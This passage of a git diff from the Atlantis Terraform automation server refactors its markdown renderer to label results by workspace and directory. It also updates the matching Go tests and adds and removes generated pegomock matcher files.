+ ExpDir string
+ }{
+ {
+ "",
+ ".",
+ },
+ {
+ "/",
+ ".",
+ },
+ {
+ "./",
+ ".",
+ },
+ // We rely on our callers to not pass in relative dirs.
+ {
+ "..",
+ "..",
+ },
+ }
+
+ for _, c := range cases {
+ t.Run(c.RepoRelDir, func(t *testing.T) {
+ cmd := events.NewCommentCommand(c.RepoRelDir, nil, events.Plan, false, "workspace", "")
+ Equals(t, c.ExpDir, cmd.RepoRelDir)
+ })
+ }
+}
+
+func TestNewCommand_EmptyWorkspace(t *testing.T) {
+ cmd := events.NewCommentCommand("dir", nil, events.Plan, false, "", "")
+ Equals(t, "default", cmd.Workspace)
+}
+
+func TestNewCommand_AllFieldsSet(t *testing.T) {
+ cmd := events.NewCommentCommand("dir", []string{"a", "b"}, events.Plan, true, "workspace", "project")
+ Equals(t, events.CommentCommand{
+ Workspace: "workspace",
+ RepoRelDir: "dir",
+ Verbose: true,
+ Flags: []string{"a", "b"},
+ Name: events.Plan,
+ ProjectName: "project",
+ }, *cmd)
+}
+
+func TestAutoplanCommand_CommandName(t *testing.T) {
+ Equals(t, events.Plan, (events.AutoplanCommand{}).CommandName())
+}
+
+func TestAutoplanCommand_IsVerbose(t *testing.T) {
+ Equals(t, false, (events.AutoplanCommand{}).IsVerbose())
+}
+
+func TestAutoplanCommand_IsAutoplan(t *testing.T) {
+ Equals(t, true, (events.AutoplanCommand{}).IsAutoplan())
+}
+
+func TestCommentCommand_CommandName(t *testing.T) {
+ Equals(t, events.Plan, (events.CommentCommand{
+ Name: events.Plan,
+ }).CommandName())
+ Equals(t, events.Apply, (events.CommentCommand{
+ Name: events.Apply,
+ }).CommandName())
+}
+
+func TestCommentCommand_IsVerbose(t *testing.T) {
+ Equals(t, false, (events.CommentCommand{
+ Verbose: false,
+ }).IsVerbose())
+ Equals(t, true, (events.CommentCommand{
+ Verbose: true,
+ }).IsVerbose())
+}
+
+func TestCommentCommand_IsAutoplan(t *testing.T) {
+ Equals(t, false, (events.CommentCommand{}).IsAutoplan())
+}
+
+func TestCommentCommand_String(t *testing.T) {
+ exp := `command="plan" verbose=true dir="mydir" workspace="myworkspace" project="myproject" flags="flag1,flag2"`
+ Equals(t, exp, (events.CommentCommand{
+ RepoRelDir: "mydir",
+ Flags: []string{"flag1", "flag2"},
+ Name: events.Plan,
+ Verbose: true,
+ Workspace: "myworkspace",
+ ProjectName: "myproject",
+ }).String())
+}
+
var mergeEventJSON = `{
"object_kind": "merge_request",
"user": {
diff --git a/server/events/executor.go b/server/events/executor.go
deleted file mode 100644
index 10df87a764..0000000000
--- a/server/events/executor.go
+++ /dev/null
@@ -1,22 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-// http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-package events
-
-//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_executor.go Executor
-
-// Executor is the generic interface implemented by each command type:
-// help, plan, and apply.
-type Executor interface {
- Execute(ctx *CommandContext) CommandResponse
-}
diff --git a/server/events/markdown_renderer.go b/server/events/markdown_renderer.go
index 978cc7776a..d21a683d70 100644
--- a/server/events/markdown_renderer.go
+++ b/server/events/markdown_renderer.go
@@ -18,6 +18,8 @@ import (
"fmt"
"strings"
"text/template"
+
+ "github.com/Masterminds/sprig"
)
// MarkdownRenderer renders responses as markdown.
@@ -44,13 +46,19 @@ type FailureData struct {
// ResultData is data about a successful response.
type ResultData struct {
- Results map[string]string
+ Results []ProjectResultTmplData
CommonData
}
+type ProjectResultTmplData struct {
+ Workspace string
+ RepoRelDir string
+ Rendered string
+}
+
// Render formats the data into a markdown string.
// nolint: interfacer
-func (m *MarkdownRenderer) Render(res CommandResponse, cmdName CommandName, log string, verbose bool) string {
+func (m *MarkdownRenderer) Render(res CommandResult, cmdName CommandName, log string, verbose bool, autoplan bool) string {
commandStr := strings.Title(cmdName.String())
common := CommonData{commandStr, verbose, log}
if res.Error != nil {
@@ -59,14 +67,22 @@ func (m *MarkdownRenderer) Render(res CommandResponse, cmdName CommandName, log
if res.Failure != "" {
return m.renderTemplate(failureWithLogTmpl, FailureData{res.Failure, common})
}
+ if len(res.ProjectResults) == 0 && autoplan {
+ return m.renderTemplate(autoplanNoProjectsWithLogTmpl, common)
+ }
return m.renderProjectResults(res.ProjectResults, common)
}
-func (m *MarkdownRenderer) renderProjectResults(pathResults []ProjectResult, common CommonData) string {
- results := make(map[string]string)
- for _, result := range pathResults {
+func (m *MarkdownRenderer) renderProjectResults(results []ProjectResult, common CommonData) string {
+ var resultsTmplData []ProjectResultTmplData
+
+ for _, result := range results {
+ resultData := ProjectResultTmplData{
+ Workspace: result.Workspace,
+ RepoRelDir: result.RepoRelDir,
+ }
if result.Error != nil {
- results[result.Path] = m.renderTemplate(errTmpl, struct {
+ resultData.Rendered = m.renderTemplate(errTmpl, struct {
Command string
Error string
}{
@@ -74,7 +90,7 @@ func (m *MarkdownRenderer) renderProjectResults(pathResults []ProjectResult, com
Error: result.Error.Error(),
})
} else if result.Failure != "" {
- results[result.Path] = m.renderTemplate(failureTmpl, struct {
+ resultData.Rendered = m.renderTemplate(failureTmpl, struct {
Command string
Failure string
}{
@@ -82,21 +98,22 @@ func (m *MarkdownRenderer) renderProjectResults(pathResults []ProjectResult, com
Failure: result.Failure,
})
} else if result.PlanSuccess != nil {
- results[result.Path] = m.renderTemplate(planSuccessTmpl, *result.PlanSuccess)
+ resultData.Rendered = m.renderTemplate(planSuccessTmpl, *result.PlanSuccess)
} else if result.ApplySuccess != "" {
- results[result.Path] = m.renderTemplate(applySuccessTmpl, struct{ Output string }{result.ApplySuccess})
+ resultData.Rendered = m.renderTemplate(applySuccessTmpl, struct{ Output string }{result.ApplySuccess})
} else {
- results[result.Path] = "Found no template. This is a bug!"
+ resultData.Rendered = "Found no template. This is a bug!"
}
+ resultsTmplData = append(resultsTmplData, resultData)
}
var tmpl *template.Template
- if len(results) == 1 {
+ if len(resultsTmplData) == 1 {
tmpl = singleProjectTmpl
} else {
tmpl = multiProjectTmpl
}
- return m.renderTemplate(tmpl, ResultData{results, common})
+ return m.renderTemplate(tmpl, ResultData{resultsTmplData, common})
}
func (m *MarkdownRenderer) renderTemplate(tmpl *template.Template, data interface{}) string {
@@ -107,15 +124,15 @@ func (m *MarkdownRenderer) renderTemplate(tmpl *template.Template, data interfac
return buf.String()
}
-var singleProjectTmpl = template.Must(template.New("").Parse("{{ range $result := .Results }}{{$result}}{{end}}\n" + logTmpl))
-var multiProjectTmpl = template.Must(template.New("").Parse(
- "Ran {{.Command}} in {{ len .Results }} directories:\n" +
- "{{ range $path, $result := .Results }}" +
- " * `{{$path}}`\n" +
+var singleProjectTmpl = template.Must(template.New("").Parse("{{$result := index .Results 0}}Ran {{.Command}} in dir: `{{$result.RepoRelDir}}` workspace: `{{$result.Workspace}}`\n{{$result.Rendered}}\n" + logTmpl))
+var multiProjectTmpl = template.Must(template.New("").Funcs(sprig.TxtFuncMap()).Parse(
+ "Ran {{.Command}} for {{ len .Results }} projects:\n" +
+ "{{ range $result := .Results }}" +
+ "1. workspace: `{{$result.Workspace}}` dir: `{{$result.RepoRelDir}}`\n" +
"{{end}}\n" +
- "{{ range $path, $result := .Results }}" +
- "## {{$path}}/\n" +
- "{{$result}}\n" +
+ "{{ range $i, $result := .Results }}" +
+ "### {{add $i 1}}. workspace: `{{$result.Workspace}}` dir: `{{$result.RepoRelDir}}`\n" +
+ "{{$result.Rendered}}\n" +
"---\n{{end}}" +
logTmpl))
var planSuccessTmpl = template.Must(template.New("").Parse(
@@ -131,9 +148,11 @@ var errTmplText = "**{{.Command}} Error**\n" +
"```\n" +
"{{.Error}}\n" +
"```\n"
+var autoplanNoProjectsTmplText = "Ran `plan` in 0 projects because Atlantis detected no Terraform changes or could not determine where to run `plan`.\n"
var errTmpl = template.Must(template.New("").Parse(errTmplText))
var errWithLogTmpl = template.Must(template.New("").Parse(errTmplText + logTmpl))
var failureTmplText = "**{{.Command}} Failed**: {{.Failure}}\n"
var failureTmpl = template.Must(template.New("").Parse(failureTmplText))
var failureWithLogTmpl = template.Must(template.New("").Parse(failureTmplText + logTmpl))
+var autoplanNoProjectsWithLogTmpl = template.Must(template.New("").Parse(autoplanNoProjectsTmplText + logTmpl))
var logTmpl = "{{if .Verbose}}\nLog
\n \n\n```\n{{.Log}}```\n
{{end}}\n"
diff --git a/server/events/markdown_renderer_test.go b/server/events/markdown_renderer_test.go
index 287996ea44..88c19ad1fc 100644
--- a/server/events/markdown_renderer_test.go
+++ b/server/events/markdown_renderer_test.go
@@ -45,18 +45,20 @@ func TestRenderErr(t *testing.T) {
r := events.MarkdownRenderer{}
for _, c := range cases {
- res := events.CommandResponse{
- Error: c.Error,
- }
- for _, verbose := range []bool{true, false} {
- t.Log("testing " + c.Description)
- s := r.Render(res, c.Command, "log", verbose)
- if !verbose {
- Equals(t, c.Expected, s)
- } else {
- Equals(t, c.Expected+"Log
\n \n\n```\nlog```\n
\n", s)
+ t.Run(c.Description, func(t *testing.T) {
+ res := events.CommandResult{
+ Error: c.Error,
}
- }
+ for _, verbose := range []bool{true, false} {
+ t.Log("testing " + c.Description)
+ s := r.Render(res, c.Command, "log", verbose, false)
+ if !verbose {
+ Equals(t, c.Expected, s)
+ } else {
+ Equals(t, c.Expected+"Log
\n \n\n```\nlog```\n
\n", s)
+ }
+ }
+ })
}
}
@@ -83,32 +85,43 @@ func TestRenderFailure(t *testing.T) {
r := events.MarkdownRenderer{}
for _, c := range cases {
- res := events.CommandResponse{
- Failure: c.Failure,
- }
- for _, verbose := range []bool{true, false} {
- t.Log("testing " + c.Description)
- s := r.Render(res, c.Command, "log", verbose)
- if !verbose {
- Equals(t, c.Expected, s)
- } else {
- Equals(t, c.Expected+"Log
\n \n\n```\nlog```\n
\n", s)
+ t.Run(c.Description, func(t *testing.T) {
+ res := events.CommandResult{
+ Failure: c.Failure,
+ }
+ for _, verbose := range []bool{true, false} {
+ t.Log("testing " + c.Description)
+ s := r.Render(res, c.Command, "log", verbose, false)
+ if !verbose {
+ Equals(t, c.Expected, s)
+ } else {
+ Equals(t, c.Expected+"Log
\n \n\n```\nlog```\n
\n", s)
+ }
}
- }
+ })
}
}
func TestRenderErrAndFailure(t *testing.T) {
t.Log("if there is an error and a failure, the error should be printed")
r := events.MarkdownRenderer{}
- res := events.CommandResponse{
+ res := events.CommandResult{
Error: errors.New("error"),
Failure: "failure",
}
- s := r.Render(res, events.Plan, "", false)
+ s := r.Render(res, events.Plan, "", false, false)
Equals(t, "**Plan Error**\n```\nerror\n```\n\n", s)
}
+func TestRenderAutoplanNoResults(t *testing.T) {
+ // If there are no project results during an autoplan we should still comment
+ // back because the user might expect some output.
+ r := events.MarkdownRenderer{}
+ res := events.CommandResult{}
+ s := r.Render(res, events.Plan, "", false, true)
+ Equals(t, "Ran `plan` in 0 projects because Atlantis detected no Terraform changes or could not determine where to run `plan`.\n\n", s)
+}
+
func TestRenderProjectResults(t *testing.T) {
cases := []struct {
Description string
@@ -121,136 +134,185 @@ func TestRenderProjectResults(t *testing.T) {
events.Plan,
[]events.ProjectResult{
{
- PlanSuccess: &events.PlanSuccess{
- TerraformOutput: "terraform-output",
- LockURL: "lock-url",
+ ProjectCommandResult: events.ProjectCommandResult{
+ PlanSuccess: &events.PlanSuccess{
+ TerraformOutput: "terraform-output",
+ LockURL: "lock-url",
+ },
},
+ Workspace: "workspace",
+ RepoRelDir: "path",
},
},
- "```diff\nterraform-output\n```\n\n* To **discard** this plan click [here](lock-url).\n\n",
+ "Ran Plan in dir: `path` workspace: `workspace`\n```diff\nterraform-output\n```\n\n* To **discard** this plan click [here](lock-url).\n\n",
},
{
"single successful apply",
events.Apply,
[]events.ProjectResult{
{
- ApplySuccess: "success",
+ ProjectCommandResult: events.ProjectCommandResult{
+ ApplySuccess: "success",
+ },
+ Workspace: "workspace",
+ RepoRelDir: "path",
},
},
- "```diff\nsuccess\n```\n\n",
+ "Ran Apply in dir: `path` workspace: `workspace`\n```diff\nsuccess\n```\n\n",
},
{
"multiple successful plans",
events.Plan,
[]events.ProjectResult{
{
- Path: "path",
- PlanSuccess: &events.PlanSuccess{
- TerraformOutput: "terraform-output",
- LockURL: "lock-url",
+ Workspace: "workspace",
+ RepoRelDir: "path",
+ ProjectCommandResult: events.ProjectCommandResult{
+ PlanSuccess: &events.PlanSuccess{
+ TerraformOutput: "terraform-output",
+ LockURL: "lock-url",
+ },
},
},
{
- Path: "path2",
- PlanSuccess: &events.PlanSuccess{
- TerraformOutput: "terraform-output2",
- LockURL: "lock-url2",
+ Workspace: "workspace",
+ RepoRelDir: "path2",
+ ProjectCommandResult: events.ProjectCommandResult{
+ PlanSuccess: &events.PlanSuccess{
+ TerraformOutput: "terraform-output2",
+ LockURL: "lock-url2",
+ },
},
},
},
- "Ran Plan in 2 directories:\n * `path`\n * `path2`\n\n## path/\n```diff\nterraform-output\n```\n\n* To **discard** this plan click [here](lock-url).\n---\n## path2/\n```diff\nterraform-output2\n```\n\n* To **discard** this plan click [here](lock-url2).\n---\n\n",
+ "Ran Plan for 2 projects:\n1. workspace: `workspace` dir: `path`\n1. workspace: `workspace` dir: `path2`\n\n### 1. workspace: `workspace` dir: `path`\n```diff\nterraform-output\n```\n\n* To **discard** this plan click [here](lock-url).\n---\n### 2. workspace: `workspace` dir: `path2`\n```diff\nterraform-output2\n```\n\n* To **discard** this plan click [here](lock-url2).\n---\n\n",
},
{
"multiple successful applies",
events.Apply,
[]events.ProjectResult{
{
- Path: "path",
- ApplySuccess: "success",
+ RepoRelDir: "path",
+ Workspace: "workspace",
+ ProjectCommandResult: events.ProjectCommandResult{
+ ApplySuccess: "success",
+ },
},
{
- Path: "path2",
- ApplySuccess: "success2",
+ RepoRelDir: "path2",
+ Workspace: "workspace",
+ ProjectCommandResult: events.ProjectCommandResult{
+ ApplySuccess: "success2",
+ },
},
},
- "Ran Apply in 2 directories:\n * `path`\n * `path2`\n\n## path/\n```diff\nsuccess\n```\n---\n## path2/\n```diff\nsuccess2\n```\n---\n\n",
+ "Ran Apply for 2 projects:\n1. workspace: `workspace` dir: `path`\n1. workspace: `workspace` dir: `path2`\n\n### 1. workspace: `workspace` dir: `path`\n```diff\nsuccess\n```\n---\n### 2. workspace: `workspace` dir: `path2`\n```diff\nsuccess2\n```\n---\n\n",
},
{
"single errored plan",
events.Plan,
[]events.ProjectResult{
{
- Error: errors.New("error"),
+ ProjectCommandResult: events.ProjectCommandResult{
+ Error: errors.New("error"),
+ },
+ RepoRelDir: "path",
+ Workspace: "workspace",
},
},
- "**Plan Error**\n```\nerror\n```\n\n\n",
+ "Ran Plan in dir: `path` workspace: `workspace`\n**Plan Error**\n```\nerror\n```\n\n\n",
},
{
"single failed plan",
events.Plan,
[]events.ProjectResult{
{
- Failure: "failure",
+ RepoRelDir: "path",
+ Workspace: "workspace",
+ ProjectCommandResult: events.ProjectCommandResult{
+ Failure: "failure",
+ },
},
},
- "**Plan Failed**: failure\n\n\n",
+ "Ran Plan in dir: `path` workspace: `workspace`\n**Plan Failed**: failure\n\n\n",
},
{
"successful, failed, and errored plan",
events.Plan,
[]events.ProjectResult{
{
- Path: "path",
- PlanSuccess: &events.PlanSuccess{
- TerraformOutput: "terraform-output",
- LockURL: "lock-url",
+ Workspace: "workspace",
+ RepoRelDir: "path",
+ ProjectCommandResult: events.ProjectCommandResult{
+ PlanSuccess: &events.PlanSuccess{
+ TerraformOutput: "terraform-output",
+ LockURL: "lock-url",
+ },
},
},
{
- Path: "path2",
- Failure: "failure",
+ Workspace: "workspace",
+ RepoRelDir: "path2",
+ ProjectCommandResult: events.ProjectCommandResult{
+ Failure: "failure",
+ },
},
{
- Path: "path3",
- Error: errors.New("error"),
+ Workspace: "workspace",
+ RepoRelDir: "path3",
+ ProjectCommandResult: events.ProjectCommandResult{
+ Error: errors.New("error"),
+ },
},
},
- "Ran Plan in 3 directories:\n * `path`\n * `path2`\n * `path3`\n\n## path/\n```diff\nterraform-output\n```\n\n* To **discard** this plan click [here](lock-url).\n---\n## path2/\n**Plan Failed**: failure\n\n---\n## path3/\n**Plan Error**\n```\nerror\n```\n\n---\n\n",
+ "Ran Plan for 3 projects:\n1. workspace: `workspace` dir: `path`\n1. workspace: `workspace` dir: `path2`\n1. workspace: `workspace` dir: `path3`\n\n### 1. workspace: `workspace` dir: `path`\n```diff\nterraform-output\n```\n\n* To **discard** this plan click [here](lock-url).\n---\n### 2. workspace: `workspace` dir: `path2`\n**Plan Failed**: failure\n\n---\n### 3. workspace: `workspace` dir: `path3`\n**Plan Error**\n```\nerror\n```\n\n---\n\n",
},
{
"successful, failed, and errored apply",
events.Apply,
[]events.ProjectResult{
{
- Path: "path",
- ApplySuccess: "success",
+ Workspace: "workspace",
+ RepoRelDir: "path",
+ ProjectCommandResult: events.ProjectCommandResult{
+ ApplySuccess: "success",
+ },
},
{
- Path: "path2",
- Failure: "failure",
+ Workspace: "workspace",
+ RepoRelDir: "path2",
+ ProjectCommandResult: events.ProjectCommandResult{
+ Failure: "failure",
+ },
},
{
- Path: "path3",
- Error: errors.New("error"),
+ Workspace: "workspace",
+ RepoRelDir: "path3",
+ ProjectCommandResult: events.ProjectCommandResult{
+ Error: errors.New("error"),
+ },
},
},
- "Ran Apply in 3 directories:\n * `path`\n * `path2`\n * `path3`\n\n## path/\n```diff\nsuccess\n```\n---\n## path2/\n**Apply Failed**: failure\n\n---\n## path3/\n**Apply Error**\n```\nerror\n```\n\n---\n\n",
+ "Ran Apply for 3 projects:\n1. workspace: `workspace` dir: `path`\n1. workspace: `workspace` dir: `path2`\n1. workspace: `workspace` dir: `path3`\n\n### 1. workspace: `workspace` dir: `path`\n```diff\nsuccess\n```\n---\n### 2. workspace: `workspace` dir: `path2`\n**Apply Failed**: failure\n\n---\n### 3. workspace: `workspace` dir: `path3`\n**Apply Error**\n```\nerror\n```\n\n---\n\n",
},
}
r := events.MarkdownRenderer{}
for _, c := range cases {
- res := events.CommandResponse{
- ProjectResults: c.ProjectResults,
- }
- for _, verbose := range []bool{true, false} {
- t.Log("testing " + c.Description)
- s := r.Render(res, c.Command, "log", verbose)
- if !verbose {
- Equals(t, c.Expected, s)
- } else {
- Equals(t, c.Expected+"Log
\n \n\n```\nlog```\n
\n", s)
+ t.Run(c.Description, func(t *testing.T) {
+ res := events.CommandResult{
+ ProjectResults: c.ProjectResults,
+ }
+ for _, verbose := range []bool{true, false} {
+ t.Run(c.Description, func(t *testing.T) {
+ s := r.Render(res, c.Command, "log", verbose, false)
+ if !verbose {
+ Equals(t, c.Expected, s)
+ } else {
+ Equals(t, c.Expected+"Log
\n \n\n```\nlog```\n
\n", s)
+ }
+ })
}
- }
+ })
}
}
diff --git a/server/events/mocks/matchers/events_commandname.go b/server/events/mocks/matchers/events_commandname.go
new file mode 100644
index 0000000000..448c937abc
--- /dev/null
+++ b/server/events/mocks/matchers/events_commandname.go
@@ -0,0 +1,20 @@
+package matchers
+
+import (
+ "reflect"
+
+ "github.com/petergtz/pegomock"
+ events "github.com/runatlantis/atlantis/server/events"
+)
+
+func AnyEventsCommandName() events.CommandName {
+ pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(events.CommandName))(nil)).Elem()))
+ var nullValue events.CommandName
+ return nullValue
+}
+
+func EqEventsCommandName(value events.CommandName) events.CommandName {
+ pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
+ var nullValue events.CommandName
+ return nullValue
+}
diff --git a/server/events/mocks/matchers/events_commandparseresult.go b/server/events/mocks/matchers/events_commandparseresult.go
deleted file mode 100644
index 12e5991a7e..0000000000
--- a/server/events/mocks/matchers/events_commandparseresult.go
+++ /dev/null
@@ -1,20 +0,0 @@
-package matchers
-
-import (
- "reflect"
-
- "github.com/petergtz/pegomock"
- events "github.com/runatlantis/atlantis/server/events"
-)
-
-func AnyEventsCommandParseResult() events.CommentParseResult {
- pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(events.CommentParseResult))(nil)).Elem()))
- var nullValue events.CommentParseResult
- return nullValue
-}
-
-func EqEventsCommandParseResult(value events.CommentParseResult) events.CommentParseResult {
- pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
- var nullValue events.CommentParseResult
- return nullValue
-}
diff --git a/server/events/mocks/matchers/events_commandresponse.go b/server/events/mocks/matchers/events_commandresponse.go
deleted file mode 100644
index f596b2c4db..0000000000
--- a/server/events/mocks/matchers/events_commandresponse.go
+++ /dev/null
@@ -1,20 +0,0 @@
-package matchers
-
-import (
- "reflect"
-
- "github.com/petergtz/pegomock"
- events "github.com/runatlantis/atlantis/server/events"
-)
-
-func AnyEventsCommandResponse() events.CommandResponse {
- pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(events.CommandResponse))(nil)).Elem()))
- var nullValue events.CommandResponse
- return nullValue
-}
-
-func EqEventsCommandResponse(value events.CommandResponse) events.CommandResponse {
- pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
- var nullValue events.CommandResponse
- return nullValue
-}
diff --git a/server/events/mocks/matchers/events_commandresult.go b/server/events/mocks/matchers/events_commandresult.go
new file mode 100644
index 0000000000..54269ef123
--- /dev/null
+++ b/server/events/mocks/matchers/events_commandresult.go
@@ -0,0 +1,20 @@
+package matchers
+
+import (
+ "reflect"
+
+ "github.com/petergtz/pegomock"
+ events "github.com/runatlantis/atlantis/server/events"
+)
+
+func AnyEventsCommandResult() events.CommandResult {
+ pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(events.CommandResult))(nil)).Elem()))
+ var nullValue events.CommandResult
+ return nullValue
+}
+
+func EqEventsCommandResult(value events.CommandResult) events.CommandResult {
+ pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
+ var nullValue events.CommandResult
+ return nullValue
+}
diff --git a/server/events/mocks/matchers/events_preexecuteresult.go b/server/events/mocks/matchers/events_preexecuteresult.go
deleted file mode 100644
index b8be09b1a2..0000000000
--- a/server/events/mocks/matchers/events_preexecuteresult.go
+++ /dev/null
@@ -1,20 +0,0 @@
-package matchers
-
-import (
- "reflect"
-
- "github.com/petergtz/pegomock"
- events "github.com/runatlantis/atlantis/server/events"
-)
-
-func AnyEventsPreExecuteResult() events.PreExecuteResult {
- pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(events.PreExecuteResult))(nil)).Elem()))
- var nullValue events.PreExecuteResult
- return nullValue
-}
-
-func EqEventsPreExecuteResult(value events.PreExecuteResult) events.PreExecuteResult {
- pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
- var nullValue events.PreExecuteResult
- return nullValue
-}
diff --git a/server/events/mocks/matchers/events_projectcommandresult.go b/server/events/mocks/matchers/events_projectcommandresult.go
new file mode 100644
index 0000000000..522a4ccf83
--- /dev/null
+++ b/server/events/mocks/matchers/events_projectcommandresult.go
@@ -0,0 +1,20 @@
+package matchers
+
+import (
+ "reflect"
+
+ "github.com/petergtz/pegomock"
+ events "github.com/runatlantis/atlantis/server/events"
+)
+
+func AnyEventsProjectCommandResult() events.ProjectCommandResult {
+ pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(events.ProjectCommandResult))(nil)).Elem()))
+ var nullValue events.ProjectCommandResult
+ return nullValue
+}
+
+func EqEventsProjectCommandResult(value events.ProjectCommandResult) events.ProjectCommandResult {
+ pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
+ var nullValue events.ProjectCommandResult
+ return nullValue
+}
diff --git a/server/events/mocks/matchers/models_projectcommandcontext.go b/server/events/mocks/matchers/models_projectcommandcontext.go
new file mode 100644
index 0000000000..3f76b9a225
--- /dev/null
+++ b/server/events/mocks/matchers/models_projectcommandcontext.go
@@ -0,0 +1,20 @@
+package matchers
+
+import (
+ "reflect"
+
+ "github.com/petergtz/pegomock"
+ models "github.com/runatlantis/atlantis/server/events/models"
+)
+
+func AnyModelsProjectCommandContext() models.ProjectCommandContext {
+ pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(models.ProjectCommandContext))(nil)).Elem()))
+ var nullValue models.ProjectCommandContext
+ return nullValue
+}
+
+func EqModelsProjectCommandContext(value models.ProjectCommandContext) models.ProjectCommandContext {
+ pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
+ var nullValue models.ProjectCommandContext
+ return nullValue
+}
diff --git a/server/events/mocks/matchers/ptr_to_events_command.go b/server/events/mocks/matchers/ptr_to_events_command.go
deleted file mode 100644
index 91edd3b663..0000000000
--- a/server/events/mocks/matchers/ptr_to_events_command.go
+++ /dev/null
@@ -1,20 +0,0 @@
-package matchers
-
-import (
- "reflect"
-
- "github.com/petergtz/pegomock"
- events "github.com/runatlantis/atlantis/server/events"
-)
-
-func AnyPtrToEventsCommand() *events.Command {
- pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(*events.Command))(nil)).Elem()))
- var nullValue *events.Command
- return nullValue
-}
-
-func EqPtrToEventsCommand(value *events.Command) *events.Command {
- pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
- var nullValue *events.Command
- return nullValue
-}
diff --git a/server/events/mocks/matchers/ptr_to_events_commentcommand.go b/server/events/mocks/matchers/ptr_to_events_commentcommand.go
new file mode 100644
index 0000000000..fbbbfcc15c
--- /dev/null
+++ b/server/events/mocks/matchers/ptr_to_events_commentcommand.go
@@ -0,0 +1,20 @@
+package matchers
+
+import (
+ "reflect"
+
+ "github.com/petergtz/pegomock"
+ events "github.com/runatlantis/atlantis/server/events"
+)
+
+func AnyPtrToEventsCommentCommand() *events.CommentCommand {
+ pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(*events.CommentCommand))(nil)).Elem()))
+ var nullValue *events.CommentCommand
+ return nullValue
+}
+
+func EqPtrToEventsCommentCommand(value *events.CommentCommand) *events.CommentCommand {
+ pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
+ var nullValue *events.CommentCommand
+ return nullValue
+}
diff --git a/server/events/mocks/matchers/ptr_to_events_trylockresponse.go b/server/events/mocks/matchers/ptr_to_events_trylockresponse.go
new file mode 100644
index 0000000000..14d747bb4a
--- /dev/null
+++ b/server/events/mocks/matchers/ptr_to_events_trylockresponse.go
@@ -0,0 +1,20 @@
+package matchers
+
+import (
+ "reflect"
+
+ "github.com/petergtz/pegomock"
+ events "github.com/runatlantis/atlantis/server/events"
+)
+
+func AnyPtrToEventsTryLockResponse() *events.TryLockResponse {
+ pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(*events.TryLockResponse))(nil)).Elem()))
+ var nullValue *events.TryLockResponse
+ return nullValue
+}
+
+func EqPtrToEventsTryLockResponse(value *events.TryLockResponse) *events.TryLockResponse {
+ pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
+ var nullValue *events.TryLockResponse
+ return nullValue
+}
diff --git a/server/events/mocks/matchers/ptr_to_github_pullrequestevent.go b/server/events/mocks/matchers/ptr_to_github_pullrequestevent.go
new file mode 100644
index 0000000000..1952cf1f74
--- /dev/null
+++ b/server/events/mocks/matchers/ptr_to_github_pullrequestevent.go
@@ -0,0 +1,20 @@
+package matchers
+
+import (
+ "reflect"
+
+ github "github.com/google/go-github/github"
+ "github.com/petergtz/pegomock"
+)
+
+func AnyPtrToGithubPullRequestEvent() *github.PullRequestEvent {
+ pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(*github.PullRequestEvent))(nil)).Elem()))
+ var nullValue *github.PullRequestEvent
+ return nullValue
+}
+
+func EqPtrToGithubPullRequestEvent(value *github.PullRequestEvent) *github.PullRequestEvent {
+ pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
+ var nullValue *github.PullRequestEvent
+ return nullValue
+}
diff --git a/server/events/mocks/matchers/ptr_to_models_repo.go b/server/events/mocks/matchers/ptr_to_models_repo.go
new file mode 100644
index 0000000000..05ba1aef35
--- /dev/null
+++ b/server/events/mocks/matchers/ptr_to_models_repo.go
@@ -0,0 +1,20 @@
+package matchers
+
+import (
+ "reflect"
+
+ "github.com/petergtz/pegomock"
+ models "github.com/runatlantis/atlantis/server/events/models"
+)
+
+func AnyPtrToModelsRepo() *models.Repo {
+ pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(*models.Repo))(nil)).Elem()))
+ var nullValue *models.Repo
+ return nullValue
+}
+
+func EqPtrToModelsRepo(value *models.Repo) *models.Repo {
+ pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
+ var nullValue *models.Repo
+ return nullValue
+}
diff --git a/server/events/mocks/matchers/slice_of_models_projectcommandcontext.go b/server/events/mocks/matchers/slice_of_models_projectcommandcontext.go
new file mode 100644
index 0000000000..08974c59cd
--- /dev/null
+++ b/server/events/mocks/matchers/slice_of_models_projectcommandcontext.go
@@ -0,0 +1,20 @@
+package matchers
+
+import (
+ "reflect"
+
+ "github.com/petergtz/pegomock"
+ models "github.com/runatlantis/atlantis/server/events/models"
+)
+
+func AnySliceOfModelsProjectCommandContext() []models.ProjectCommandContext {
+ pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*([]models.ProjectCommandContext))(nil)).Elem()))
